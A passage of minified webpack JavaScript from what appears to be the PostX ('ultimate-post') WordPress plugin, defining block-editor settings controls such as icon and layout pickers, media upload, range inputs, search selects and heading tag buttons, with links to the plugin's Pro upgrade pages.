Icon","ultimate-post")),(0,o.createElement)("option",{value:"line"},__("Line Icon","ultimate-post")))),(0,o.createElement)("div",{className:"ultp-dropdown-icon"},w().map((t=>(0,o.createElement)("span",{onClick:()=>l(t),key:t,className:`${e==t?"active":t}`},f[t])))))})),p&&(0,o.createElement)("div",{className:"ultp-sub-dropdown ultp-icondropdown-container"},(0,o.createElement)("div",{className:"ultp-search-icon"},(0,o.createElement)("input",{type:"text",placeholder:"Search Icons",onChange:e=>b(e.target.value)})),(0,o.createElement)("div",{className:"ultp-searchIcon-filter"},__("Icon Type","ultimate-post"),(0,o.createElement)("select",{onChange:e=>h(e.target.value)},(0,o.createElement)("option",{selected:!0,value:""},__("Show All Icon","ultimate-post")),(0,o.createElement)("option",{value:"solid"},__("Solid Icon","ultimate-post")),(0,o.createElement)("option",{value:"line"},__("Line Icon","ultimate-post")))),(0,o.createElement)("div",{className:"ultp-dropdown-icon"},w().map((t=>{let a=t.replace(/([A-Z])/g," $1").replace(/[_-]/g," ").replace(/(\d)/g," $1").replace(/\b\w/g,(e=>e.toUpperCase()));return(0,o.createElement)(i,{text:a,key:t},(0,o.createElement)("span",{onClick:()=>l(t),className:`${e==t?"active":t}`},f[t]))})))),g&&g?.length>0&&(0,o.createElement)("div",{className:"ultp-sub-help"},(0,o.createElement)("i",null,g)))}},3248:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294),a=l(83100);const i=e=>{const{value:t,options:l,label:i,pro:n,col:r,tab:s,onChange:p,block:c,selector:u}=e;return(0,o.createElement)("div",{className:`${u} ultp-field-wrap ultp-field-layout column-`+(r||"two"),tabIndex:0},i&&(0,o.createElement)("label",{className:"ultp-field-label"},i),(0,o.createElement)("div",{className:"ultp-field-layout-wrapper"},l.map(((e,l)=>(0,o.createElement)("div",{key:l,onClick:()=>((e,t,l)=>{const o=((e,t)=>{const l={};switch(c){case"post-grid-7":l.layout=e,l.queryNumber="layout1"==e||"layout4"==e?"4":"3";break;case"post-grid-3":l.layout=e,l.column="layout3"==e||"layout4"==e||"layout5"==e?"3":"2",l.queryNumber=5;break;case"post-grid-4":l.layout=e,l.queryNumber="layout4"==e||"layout5"==e?"4":"3";break;case"post-grid-1":t?(l.gridStyle=e,"style3"==e&&(l.columns={lg:2}),"style4"==e&&(l.columns={lg:3})):l.layout=e;break;case"post-list-1":t?(l.gridStyle=e,"style2"==e&&(l.columns={lg:2,xs:1}),"style3"==e&&(l.columns={lg:2,xs:1})):l.layout=e;break;default:l.layout=e}return l})(e,l);t?ultp_data.active?p(o):window.open((0,a.Z)("","blockProLay",ultp_data.affiliate_id,"#pricing"),"_blank"):p(o)})(e.value,e.pro,s),className:e.value==t?"ultp-field-layout-items active":"ultp-field-layout-items"},(0,o.createElement)("div",{className:`ultp-field-layout-item ${!e.pro&&"ultp-layout-free"} ${n&&ultp_data.active&&"ultp-field-layout-item-pro"}`},(0,o.createElement)("div",{className:"ultp-field-layout-content"},e.pro&&!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-field-layout-pro"},"Pro"),(0,o.createElement)("img",{src:ultp_data.url+e.img}))),e.demoImg&&(0,o.createElement)("div",{className:`ultp-layout-hover__content ultp-layout-tooltip-layout${l+1}`},(0,o.createElement)("div",{className:"ultp-layout-hover__popup"},(0,o.createElement)("img",{src:e.demoImg,alt:"Layout Popup Image"}),(0,o.createElement)("div",null,e.pro&&!ultp_data.active&&(0,o.createElement)("a",{href:(0,a.Z)("","blockUpgrade",ultp_data.affiliate_id)},"Upgrade Pro"),(0,o.createElement)("a",{href:e.demoUrl,target:"_blank",className:"view-demo",rel:"noreferrer"},"View Demo",(0,o.createElement)("span",{className:"dashicons dashicons-arrow-right-alt"}))))))))))}},69811:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(64766),i=l(83100);const{useState:n}=wp.element,r=({value:e,options:t,label:l,pro:r,tab:s,onChange:p,block:c,isInline:u})=>{const[d,m]=n(!1);return(0,o.createElement)("div",{className:"ultp-field-wrap"},(0,o.createElement)("div",{className:"ultp-field-layout2 "+(u?"ultp-field-layout2-inline":"ultp-field-layout2-block")},(0,o.createElement)("label",{className:"ultp-field-layout2-label"},l||"Layout"),(0,o.createElement)("div",{className:"ultp-field-layout2-select",onClick:()=>m((e=>!e))},t.filter((t=>t.value==e)).map(((e,t)=>(0,o.createElement)("div",{key:t,className:"ultp-field-layout2-select-items"},(0,o.createElement)("div",{className:"ultp-field-layout2-img"},(0,o.createElement)("img",{src:ultp_data.url+e.img}),e.pro&&!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-field-layout2-pro"},"Pro")),(0,o.createElement)("span",{className:"ultp-field-layout2-select-text"},e.label,(0,o.createElement)("span",{className:"ultp-field-layout2-select-icon "+(d?"ultp-dropdown-icon-rotate":"")},a.ZP.collapse_bottom_line))))),d&&(0,o.createElement)("div",{className:"ultp-field-layout2-dropdown"},t.filter((t=>t.value!=e)).map(((e,t)=>(0,o.createElement)("div",{key:t,onClick:()=>((e,t,l)=>{const o=((e,t)=>{const l={};switch(c){case"post-grid-7":l.layout=e,l.queryNumber="layout1"==e||"layout4"==e?"4":"3";break;case"post-grid-3":l.layout=e,l.column="layout3"==e||"layout4"==e||"layout5"==e?"3":"2",l.queryNumber=5;break;case"post-grid-4":l.layout=e,l.queryNumber="layout4"==e||"layout5"==e?"4":"3";break;case"post-grid-1":t?(l.gridStyle=e,"style3"==e&&(l.columns={lg:2}),"style4"==e&&(l.columns={lg:3})):l.layout=e;break;case"post-list-1":t?(l.gridStyle=e,"style2"==e&&(l.columns={lg:2,xs:1}),"style3"==e&&(l.columns={lg:2,xs:1})):l.layout=e;break;default:l.layout=e}return l})(e,l);t?ultp_data.active?p(o):window.open((0,i.Z)("https://www.wpxpo.com/postx/all-features/","blockProLay",ultp_data.affiliate_id),"_blank"):p(o)})(e.value,e.pro,s),className:"ultp-field-layout2-select-items ultp-field-layout2-dropdown-items"},(0,o.createElement)("div",{className:"ultp-field-layout2-img"},(0,o.createElement)("img",{src:ultp_data.url+e.img}),e.pro&&!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-field-layout2-pro"},"Pro")),(0,o.createElement)("span",null,e.label))))))),r&&!ultp_data.active&&(0,o.createElement)("div",{className:"ultp-field-pro-message"},"To Unlock All Layouts"," ",(0,o.createElement)("a",{href:"https://www.wpxpo.com/postx/all-features/?utm_source=db-postx-editor&utm_medium=pro-layout&utm_campaign=postx-dashboard",target:"_blank",rel:"noreferrer"},"Upgrade Pro")))}},17024:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(53049);const{__}=wp.i18n,{Tooltip:i}=wp.components,{useState:n}=wp.element,r=e=>{const{text:t,value:l,label:r,placeholder:s,onlyLink:p,onChange:c,store:u,disableLink:d=!1,extraBtnAttr:m}=e,[g,y]=n(!1),{target:b,follow:v,sponsored:h,download:f}=m||{};return(0,o.createElement)("div",{className:"ultp-field-wrap "+(p?"ultp-field-selflink":"ultp-field-link-button")},r&&(0,o.createElement)("label",null,r),p?(0,o.createElement)("div",null,(0,o.createElement)("span",{className:"ultp-link-section"},(0,o.createElement)("span",{className:"ultp-link-input"},(0,o.createElement)("input",{type:"text",onChange:e=>{return t=e,void(d||c(m?t.target.value:{url:t.target.value}));var t},value:d?"Dynamic URL":m?l:l?.url,placeholder:s,disabled:d}),(m&&l||l?.url)&&(0,o.createElement)("span",{className:"ultp-image-close-icon dashicons dashicons-no-alt",onClick:()=>{c({url:""})}})),(0,o.createElement)("span",{className:"ultp-link-options"},(0,o.createElement)("span",{className:"ultp-collapse-section",onClick:()=>{y(!g)}},(0,o.createElement)("span",{className:`ultp-short-collapse ${g&&" active"}`,type:"button"})))),g&&(0,o.createElement)("div",{className:"ultp-short-content active"},(0,o.createElement)(a.T,{include:[(m&&m.target||!m)&&{position:1,data:{type:"select",key:b?.key||"btnLinkTarget",label:b?.label||__("Link Target","ultimate-post"),options:b?.options||[{value:"_self",label:__("Same Tab/Window","ultimate-post")},{value:"_blank",label:__("Open in New Tab","ultimate-post")}]}},(m&&m.follow||!m)&&{position:2,data:{type:"toggle",key:v?.key||"btnLinkNoFollow",label:v?.label||__("No Follow","ultimate-post")}},(m&&m.sponsored||!m)&&{position:3,data:{type:"toggle",key:h?.key||"btnLinkSponsored",label:h?.label||__("Sponsored","ultimate-post")}},(m&&m.download||!m)&&{position:4,data:{type:"toggle",key:f?.key||"btnLinkDownload",label:f?.label||__("Download","ultimate-post")}}],initialOpen:!0,store:u}))):(0,o.createElement)("div",{className:"ultp-sub-field"},(0,o.createElement)(i,{text:s,placement:"bottom"},(0,o.createElement)("a",{href:l,target:"_blank",rel:"noreferrer"},t))))}},3780:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(64766),i=l(69735);const{__}=wp.i18n,{MediaUpload:n}=wp.blockEditor,{useState:r}=wp.element,s=e=>{const{multiple:t,onChange:l,value:s,type:p,label:c,block:u,handleLoader:d,dcEnabled:m=!1,DynamicContent:g=null}=e,[y,b]=r({}),[v,h]=r(!1),f=o=>{if(t){const t=e.value.slice();t.splice(o,1),l(t)}else l({})},k=e=>{t||l({url:e.target.value,id:99999})};return(0,o.createElement)("div",{className:`ultp-field-wrap ultp-field-media ${v?"ultp-img-uploading":""}\n\t\t\t${c?"ultp-label-space":""}`},c&&(0,o.createElement)("label",null,c),(0,o.createElement)(n,{onSelect:e=>(e=>{if(e.id&&null==y[e?.id]&&"image-block"==u?(h(!0),d(!0),wp.apiFetch({path:"/ultp/v2/get_ultp_image_size",method:"POST",data:{id:e.id,wpnonce:ultp_data.security}}).then((t=>{b({...y,[e.id]:t?.size}),l({url:e.url,id:e.id,size:t?.size,alt:e.alt,caption:e.caption}),h(!1),d(!1)})).catch((e=>{console.log("error")}))):"image-block"==u&&(l({url:e.url,id:e.id,size:y[e?.id],alt:e.alt,caption:e.caption}),h(!1),d(!1)),t){const t=[];e.forEach((e=>{e&&e.url&&t.push({url:e.url,id:e.id,alt:e.alt,caption:e.caption})})),l(s?s.concat(t):t)}else e&&e.url&&e.id&&"image-block"!=u&&l({url:e.url,id:e.id,size:e.sizes,alt:e.alt,caption:e.caption})})(e),allowedTypes:p||["image"],multiple:t||!1,value:s,render:({open:e})=>(0,o.createElement)("div",{className:"ultp-media-img ultp-sub-field"},t?(0,o.createElement)("div",{className:"ultp-multiple-img"},s.length>0&&s.map(((e,t)=>{return(0,o.createElement)("span",{key:t,className:"ultp-media-image-item"},(0,o.createElement)("img",{src:(l=e.url,-1!=["wbm","jpg","jpeg","gif","png"].indexOf(l.split(".").pop().toLowerCase())?l:ultp_data.url+"assets/img/ultp-placeholder.jpg"),alt:__("image","ultimate-post")}),(0,o.createElement)("span",{className:"ultp-image-close-icon dashicons dashicons-no-alt",onClick:()=>f(t)}));var l})),(0,o.createElement)("div",{onClick:e,className:"ultp-placeholder-image"},(0,o.createElement)("span",null,__("Upload","ultimate-post")))):s&&s.url?(0,o.createElement)("span",{className:"ultp-media-image-item"},(0,o.createElement)("input",{type:"text",className:"ultp-text-input-control",onChange:e=>k(e),value:s.url,disabled:(0,i.o6)()&&m}),(0,o.createElement)("div",{className:"ultp-media-preview-container"},(0,o.createElement)("div",{className:"ultp-placeholder-image"},(0,o.createElement)("img",{onClick:e,src:s.url,alt:"Saved Media"}),!m&&(0,o.createElement)("span",{className:"ultp-image-close-icon",onClick:()=>f()},a.ZP.close_line),(0,o.createElement)("span",{className:"ultp-placeholder-upload-text"},__("Choose Image","ultimate-post"))),(0,i.o6)()&&g)):(0,o.createElement)("span",{className:"ultp-media-image-item"},(0,o.createElement)("input",{type:"text",className:"ultp-text-input-control",onChange:e=>k(e),value:"",disabled:(0,i.o6)()&&m}),(0,o.createElement)("div",{className:"ultp-media-preview-container"},(0,o.createElement)("div",{onClick:e,className:"ultp-placeholder-image"},(0,o.createElement)("span",{className:"ultp-media-upload-plus"},a.ZP.plus2),(0,o.createElement)("span",{className:"ultp-placeholder-upload-text"},__("Choose Image","ultimate-post"))),(0,i.o6)()&&g)))}))}},7928:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(56834),i=l(58421);const n=e=>{const{value:t,onChange:l,responsive:n,min:r,max:s,unit:p,label:c,multiple:u,setDevice:d,device:m,step:g,handleTypoFieldPresetData:y}=e,b=(e="")=>{if("unit"==e)return t?n?t["u"+m]||"px":t.unit||"px":"px";const l=t?n?t[m]||"":t.value||t:"";return y?y(l):l},v=(e,o)=>{let a=t?{...t}:{};m&&p&&!a?.hasOwnProperty("u"+m)&&(a["u"+m]="px"),"unit"==o&&n?a["u"+m]=e:(a=n?Object.assign({},t,{[m]:e}):"object"==typeof t?Object.assign({},t,{[o]:e}):e,a=r?a<r?r:a:a<0?0:a,a=s?a>s?s:a:a>1e3?1e3:a),l(a)};return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-number"},(0,o.createElement)("div",{className:"ultp-field-label-responsive"},c&&(0,o.createElement)("label",null,c),n&&!u&&(0,o.createElement)(a.Z,{setDevice:d,device:m}),p&&(0,o.createElement)(i.Z,{unit:p,value:b("unit"),setSettings:v})),(0,o.createElement)("div",{className:"ultp-responsive-label ultp-field-unit"},(0,o.createElement)("input",{type:"number",step:(()=>{const e=b("unit");return"em"==e||"rem"==e?.001:g||1})(),min:r,max:s,onChange:e=>v(e.target.value,"value"),value:b()})))}},86849:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);const a=e=>{const{value:t,options:l,label:a,onChange:i,isText:n}=e;return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-radio-image"},a&&(0,o.createElement)("label",null,a),(0,o.createElement)("div",{className:"ultp-field-radio-image-content"},n?l.map(((e,l)=>(0,o.createElement)("div",{className:"ultp-field-radio-text",key:l,onClick:()=>i(e.value)},(0,o.createElement)("span",{className:e.value==t?"active":""},e.label)))):(0,o.createElement)("div",{className:"ultp-field-radio-image-items"},l.map(((e,l)=>(0,o.createElement)("div",{className:e.value==t?"ultp-radio-image active":"ultp-radio-image",key:l,onClick:()=>i(e.value)},(0,o.createElement)("img",{loading:"lazy",src:e.url})))))))}},21525:(e,t,l)=>{"use strict";l.d(t,{Z:()=>m});var o=l(67294),a=l(64766),i=l(20107),n=l(53049),r=l(83100),s=l(56834),p=l(58421);const{__}=wp.i18n,{useState:c,useRef:u,useEffect:d}=wp.element,m=e=>{const{value:t,unit:l,onChange:m,label:g,responsive:y,pro:b,device:v,setDevice:h,step:f,min:k,max:w,help:x,clientId:T,updateChild:_,_inline:C}=e,E=u(null),[S,P]=c(0);d((()=>{P(E?.current.offsetWidth||150)}),[E?.current]);const L=()=>"em"==I("unit")?.01:f||1,I=e=>"unit"==e?t?.onlyUnit?t?.unit||"px":t?y?t["u"+v]||"px":t.unit||"px":"px":t?.onlyUnit?t?._value||"":t?y?t[v]||"":t:"",B=(e,o)=>{let a=t?{...t}:{};t?.onlyUnit?"unit"==o?a.unit=e:a._value=e:(v&&l&&!a?.hasOwnProperty("u"+v)&&(a["u"+v]=a?.hasOwnProperty("unit")?a.unit:"px"),"unit"==o&&y?a["u"+v]=e:(a=y?Object.assign({},t,a,{[v]:e}):e,a=k?a<k?k:a:a<0?0:a,a=w?a>w?w:a:a>1e3?1e3:a)),b?ultp_data.active&&m(a):m(a),_&&(0,n.Gu)(T)},U=e=>{B("increment"==e?Number(I())+Number(L()):Number(I())-Number(L()))};return(0,o.createElement)("div",{className:(0,i.Z)({"ultp-field-wrap ultp-field-range":!0,"ultp-base-control-responsive":y,"ultp-pro-field":b&&!ultp_data.active})},(0,o.createElement)("div",{className:"ultp-field-label-responsive"},g&&(0,o.createElement)("label",null,g),y&&(0,o.createElement)(s.Z,{setDevice:h,device:v}),l&&(0,o.createElement)(p.Z,{unit:l,value:I("unit"),setSettings:B})),(0,o.createElement)("div",{className:"ultp-range-control"},(0,o.createElement)("div",{className:"ultp-range-input ultp-range-input-flex"},(0,o.createElement)("div",{className:"ultp-range-slider-wrap"},(0,o.createElement)("input",{ref:E,type:"range",min:k,max:w,value:I(),step:L(),onChange:e=>B(e.target.value)}),(0,o.createElement)("div",{className:"ultp-range-value",style:{width:`${(()=>{if(!I()||!w)return 0;const e=Number(I()),t=Number(w),l=Number(k||0);return(e-l)/(t-l)*S})()}px`}})),(0,o.createElement)("div",{className:"ultp-input-number-custom"},(0,o.createElement)("input",{type:"number",min:k,max:w,value:I(),step:L(),onChange:e=>B(e.target.value)}),(0,o.createElement)("div",{className:"ultp-input-number-apperance"},(0,o.createElement)("div",{onClick:()=>U("increment"),className:"ultp-input-number-custom-up-icon"},a.ZP.arrowUp2),(0,o.createElement)("div",{onClick:()=>U("decrement"),className:"ultp-input-number-custom-down-icon"},a.ZP.arrowDown2))))),x&&(0,o.createElement)("div",{className:"ultp-sub-help"},(0,o.createElement)("i",null,x)),b&&!ultp_data.active&&(0,o.createElement)("div",{className:"ultp-field-pro-message"},__("Unlock It! Explore More","ultimate-post")," ",(0,o.createElement)("a",{href:(0,r.Z)("https://www.wpxpo.com/postx/all-features/","blockProFeat",ultp_data.affiliate_id),target:"_blank",rel:"noreferrer"},__("Pro Features","ultimate-post"))))}},81931:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(56834);const{dispatch:i}=wp.data,{Tooltip:n}=wp.components,r={col_1:{lg:[[100]],sm:[[100]],xs:[[100]]},col_2:{lg:[[50,50],[70,30],[30,70],[100,100]],sm:[[50,50],[70,30],[30,70],[100,100]],xs:[[50,50],[70,30],[30,70],[100,100]]},col_3:{lg:[[33.33,33.33,33.34],[25,25,50],[50,25,25],[25,50,25],[20,60,20],[15,70,15],[100,100,100]],sm:[[33.33,33.33,33.34],[25,25,50],[50,25,25],[25,50,25],[20,60,20],[15,70,15],[100,50,50],[50,50,100],[100,100,100]],xs:[[33.33,33.33,33.34],[25,25,50],[50,25,25],[25,50,25],[20,60,20],[15,70,15],[100,50,50],[50,50,100],[100,100,100]]},col_4:{lg:[[25,25,25,25],[20,20,20,40],[40,20,20,20]],sm:[[25,25,25,25],[20,20,20,40],[40,20,20,20],[50,50,50,50],[100,100,100,100]],xs:[[25,25,25,25],[20,20,20,40],[40,20,20,20],[50,50,50,50],[100,100,100,100]]},col_5:{lg:[[20,20,20,20,20],[100,100,100,100,100]],sm:[[20,20,20,20,20],[100,100,100,100,100]],xs:[[20,20,20,20,20],[100,100,100,100,100]]},col_6:{lg:[[16.66,16.66,16.66,16.66,16.66,16.7]],sm:[[16.66,16.66,16.66,16.66,16.66,16.7],[50,50,50,50,50,50],[33.33,33.33,33.34,33.33,33.33,33.34],[100,100,100,100,100,100]],xs:[[16.66,16.66,16.66,16.66,16.66,16.7],[50,50,50,50,50,50],[33.33,33.33,33.34,33.33,33.33,33.34],[100,100,100,100,100,100]]}},s=e=>{const{value:t,label:l,layout:s,responsive:p,device:c,setDevice:u,clientId:d}=e,m=wp.data.select("core/block-editor").getBlocks(d);return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-layout"},(0,o.createElement)("div",{className:"ultp-columnLayout-label"},l&&(0,o.createElement)("label",null,l),p&&(0,o.createElement)(a.Z,{setDevice:u,device:c})),(0,o.createElement)("div",{className:"ultp-field-layout-wrapper ultp-panel-column"},r["col_"+t.lg.length][c].map(((e,l)=>{const a=e.every((e=>e>99));return(0,o.createElement)(n,{delay:0,visible:!0,position:"bottom",text:e.join(" : "),key:l},(0,o.createElement)("div",{className:"ultp-row-size ultp-field-layout-items "+(t[c]==e.join(",")?"active":""),onClick:()=>{i("core/block-editor").updateBlockAttributes(d,{layout:Object.assign({},s,{[c]:e})}),m?.length>0&&m.forEach(((t,l)=>{i("core/block-editor").updateBlockAttributes(t.clientId,{columnWidth:Object.assign({},t.attributes.columnWidth,{[c]:e[l]})})}))},style:{flexDirection:(a?"column":"")+" "}},e.map(((e,t,l)=>4!=l.length&&6!=l.length||JSON.stringify(l)!=JSON.stringify([50,50,50,50])&&JSON.stringify(l)!=JSON.stringify([50,50,50,50,50,50])&&JSON.stringify(l)!=JSON.stringify([33.33,33.33,33.34,33.33,33.33,33.34])?(0,o.createElement)("div",{className:e>99?"ultp-layout-vertical":"",style:{width:`${e}%`},key:t}):(0,o.createElement)("div",{className:"ultp-layout-half",style:{width:`calc(${e}% - 5px )`},key:t})))))}))))}},68073:(e,t,l)=>{"use strict";l.d(t,{Z:()=>u});var o=l(67294),a=l(64766),i=l(83100);const{__}=wp.i18n,{apiFetch:n}=wp,{useState:r,useEffect:s,useRef:p}=wp.element,{Spinner:c}=wp.components,u=e=>{const t=p(),[l,u]=r(!1),[d,m]=r([]),[g,y]=r(""),[b,v]=r(!0),{label:h,value:f,onChange:k,search:w,condition:x,pro:T,single:_=!1,noIdInTitle:C=!1,postType:E=[]}=e,S=async(e="")=>{v(!0),n({path:"/ultp/v1/search",method:"POST",data:{type:w,term:e,condition:x,postType:E}}).then((e=>{if(e.success)if(f.length>0&&e.data.length>0){const t=JSON.stringify(f),l=e.data.filter((function({value:e,title:l,live_title:o}){return t.indexOf(JSON.stringify("taxvalue"==w&&o?{value:e,title:l,live_title:o}:{value:e,title:l}))<0}));m(l),v(!1)}else m(e.data),v(!1)}))},P=e=>{t.current.contains(e.target)||u(!1)};s((()=>(document.addEventListener("mousedown",P),()=>document.removeEventListener("mousedown",P))),[]);const L=(e=!0)=>{T&&!ultp_data.active||(e&&(v(!0),S()),u(e))};return(0,o.createElement)("div",{className:"ultp-field-search ultp-field-wrap ultp-field-select "+(T&&!ultp_data.active?"ultp-pro-field":"")},h&&(0,o.createElement)("span",{className:"ultp-label-control"},(0,o.createElement)("label",null,h)),(0,o.createElement)("div",{ref:t,className:"ultp-popup-select ultp-multiple-value-select"},(0,o.createElement)("span",{className:(l?"isOpen ":"")+" ultp-selected-text ultp-selected-dropdown--icon"},(0,o.createElement)("span",{onClick:()=>L(!0),className:"ultp-search-value ultp-multiple-value"},f.map(((e,t)=>(0,o.createElement)("span",{key:t},!_&&(0,o.createElement)("span",{className:"ultp-updown-container"},(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),(e=>{if(T&&!ultp_data.active)return;const t=f.slice(0);f.length>e+1&&(t[e+1]=t.splice(e,1,t[e+1])[0],m(t),k(t))})(t)},className:"ultp-select-swap dashicons dashicons-arrow-down-alt2"})),C?e.title?.replaceAll("&amp;","&").replace(/^\[ID:\s\d+\]/,"").trim():e.title?.replaceAll("&amp;","&"),(0,o.createElement)("span",{onClick:()=>(e=>{if(T&&!ultp_data.active)return;f.splice(e,1);const t=d.filter((function(e){return f.indexOf(e)<0}));m(t),k(f)})(t),className:"ultp-select-close"},"×"))))),(0,o.createElement)("span",{className:"ultp-search-divider"}),(0,o.createElement)("span",{className:"ultp-search-icon ultp-search-dropdown--icon",onClick:()=>L(!l)},l?a.ZP.arrowUp2:a.ZP.arrowDown2)),(0,o.createElement)("span",null,l&&(0,o.createElement)("ul",null,(0,o.createElement)("div",{className:"ultp-select-search"},(0,o.createElement)("input",{type:"text",placeholder:__("Search here for more…","ultimate-post"),value:g,onChange:e=>(e=>{const t=e.target.value;t.length>0&&S(t),y(t)})(e),autoComplete:"off"}),b&&(0,o.createElement)(c,null)),d.map(((e,t)=>(0,o.createElement)("li",{key:t,onClick:()=>(e=>{if(T&&!ultp_data.active)return;_&&f.splice(0,f.length),f.push(e);const t=d.filter((function(e){return f.indexOf(e)<0}));m(t),k(f),u(!1)})(e)},C?e.title?.replaceAll("&amp;","&").replace(/^\[ID:\s\d+\]/,"").trim():e.title?.replaceAll("&amp;","&"))))))),T&&!ultp_data.active&&(0,o.createElement)("div",{className:"ultp-field-pro-message"},__("To Enable This Feature","ultimate-post")," ",(0,o.createElement)("a",{href:(0,i.Z)("https://www.wpxpo.com/postx/all-features/","blockProFeat",ultp_data.affiliate_id),target:"_blank",rel:"noreferrer"},__("Upgrade to Pro","ultimate-post"))))}},22217:(e,t,l)=>{"use strict";l.d(t,{Z:()=>g});var o=l(67294),a=l(64766),i=l(20107),n=l(53049),r=l(83100),s=l(56834);const{__}=wp.i18n,{Fragment:p,useState:c,useEffect:u,useRef:d}=wp.element,m=({dynamicHelpText:e,value:t})=>Object.keys(e?.select).map((l=>l==t?(0,o.createElement)("i",null," ",e?.select[l]," "):"")),g=e=>{const{label:t,responsive:l,options:g,multiple:y,value:b,pro:v,image:h,setDevice:f,device:k,onChange:w,help:x,condition:T,keys:_,beside:C,svg:E,svgClass:S,clientId:P,updateChild:L,defaultMedia:I,classes:B,proLink:U,dynamicHelpText:M}=e,A=d(),[H,N]=c(!1);u((()=>{const e=e=>{A.current.contains(e.target)||N(!1)};return document.addEventListener("mousedown",e),()=>document.removeEventListener("mousedown",e)}),[]);const j=e=>{if(!v||ultp_data.active){if(y){const t=b.length?b:[];-1==b.indexOf(e)&&t.push(e),w(t)}else{let t=!0;if(T&&Object.keys(T).forEach((function(l){e==l&&(t=!1,w(Object.assign({},{[_]:e},T[l])))})),t){const t=l?Object.assign({},b,{[k]:e}):e;w(t)}}L&&(0,n.Gu)(P)}},Z=(e,t)=>{const l=g.filter((t=>t.value==e));if(l[0])return t&&l[0].svg?l[0].svg:l[0].label},O=e=>{window.open(e||U||ultp_data.premium_link,"_blank")};return(0,o.createElement)(p,null,(0,o.createElement)("div",{ref:A,className:`ultp-field-wrap ultp-field-select ${B||""} ${v&&!ultp_data.active?"ultp-pro-field":""} `},(0,o.createElement)("div",{className:C?"ultp-field-beside":""},(0,o.createElement)("div",{className:"ultp-label-control"},t&&(0,o.createElement)("label",null,t),l&&!y&&(0,o.createElement)(s.Z,{setDevice:f,device:k})),(0,o.createElement)("div",{className:"ultp-popup-select "+(E?"svgIcon "+S:"")},(0,o.createElement)("span",{tabIndex:0,className:(0,i.Z)({isOpen:H,"ultp-selected-text":!0,"ultp-multiple-value-added":y&&b?.length>0}),onClick:()=>N(!H)},y?(0,o.createElement)("span",{className:"ultp-search-value ultp-multiple-value ultp-select-dropdown--tag "},b.map(((e,t)=>(0,o.createElement)("span",{key:t,onClick:()=>{return t=e,void w(b.filter((e=>e!=t)));var t}},Z(e)&&Z(e).replaceAll("&amp;","&"),(0,o.createElement)("span",{className:"ultp-select-close"},a.ZP?.close_line))))):(0,o.createElement)("span",{className:"ultp-search-value"},I?(0,o.createElement)("img",{src:(e=>{const t=g.filter((t=>t.value==e));return ultp_data.url+t[0].img})(b)}):Z(y?b||[]:b?l?b[k]||"":b:"",E)),y&&(0,o.createElement)("span",{className:"ultp-search-divider"}),(0,o.createElement)("div",{className:"ultp-search-icon"},H?a.ZP.arrowUp2:a.ZP.arrowDown2)),H&&(0,o.createElement)("ul",null,g.map(((e,t)=>(0,o.createElement)("li",{key:t,onClick:()=>{e.disabled||(N(!H),e.pro?ultp_data.active?j(e.value):(e.isHeader||e.isChild)&&O(e.link):j(e.value))},value:e.value,className:(0,i.Z)({"ultp-select-header":e.isHeader,"ultp-select-header-pro":e.isHeader&&e.pro&&!ultp_data.active,"ultp-select-group":e.isChild,"ultp-select-group-pro":e.isChild&&e.pro&&!ultp_data.active,"ultp-select-matched":y?b.includes(e.value):b===e.value})},E&&e.svg?e.svg:h?(0,o.createElement)("img",{alt:e.label||"",src:ultp_data.url+e.img}):(0,o.createElement)(p,null,e.label.replaceAll("&amp;","&")," ",e.isHeader&&e.pro&&!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-pro-text2"},"(Get Pro)")),a.ZP[e.icon]||""," ",!e.pro||e.isHeader||e.isChild||ultp_data.active?null:(0,o.createElement)("span",{onClick:()=>O(e.link),className:"ultp-pro-text"},"[Pro]"))))))),x&&(0,o.createElement)("div",{className:"ultp-sub-help"},(0,o.createElement)("i",null,x)),M&&M?.select?.key==_&&(0,o.createElement)("div",{className:"ultp-sub-help"},(0,o.createElement)(m,{dynamicHelpText:M,value:b})),v&&!ultp_data.active&&(0,o.createElement)("div",{className:"ultp-field-pro-message"},__("To Enable This Feature","ultimate-post")," ",(0,o.createElement)("a",{href:(0,r.Z)("https://www.wpxpo.com/postx/all-features/","blockProFeat",ultp_data.affiliate_id),target:"_blank",rel:"noreferrer"},__("Upgrade to Pro","ultimate-post")))))}},64390:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);const a=e=>{const{label:t,fancy:l}=e;return l&&t?(0,o.createElement)("div",{className:"ultp-separator-ribbon-wrapper"},(0,o.createElement)("div",{className:"ultp-separator-ribbon"},t)):(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-separator"+(t?"":" ultp-separator-padding")},(0,o.createElement)("div",null,t&&(0,o.createElement)("span",null,t)))}},42616:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(64766),i=l(20107);const n=e=>{const{value:t,options:l,label:n,toolbar:r,disabled:s,onChange:p,inline:c}=e,u=l||[{value:"h1",label:"H1"},{value:"h2",label:"H2"},{value:"h3",label:"H3"},{value:"h4",label:"H4"},{value:"h5",label:"H5"},{value:"h6",label:"H6"},{value:"p",label:"P"},{value:"div",label:"DIV"},{value:"span",label:"SPAN"}];return(0,o.createElement)("div",{className:(0,i.Z)({"ultp-field-wrap ultp-field-tag":!0,"ultp-taginline":c,"ultp-tag-inline":r,"ultp-label-space":n})},n&&(0,o.createElement)("label",{className:"ultp-field-label"},n),(0,o.createElement)("div",{className:"ultp-sub-field"},u.map(((e,l)=>(0,o.createElement)("span",{key:l,tabIndex:0,className:e.value==t?"ultp-tag-button active":"ultp-tag-button",onClick:()=>{return l=e.value,void p(s&&t==l?"":l);var 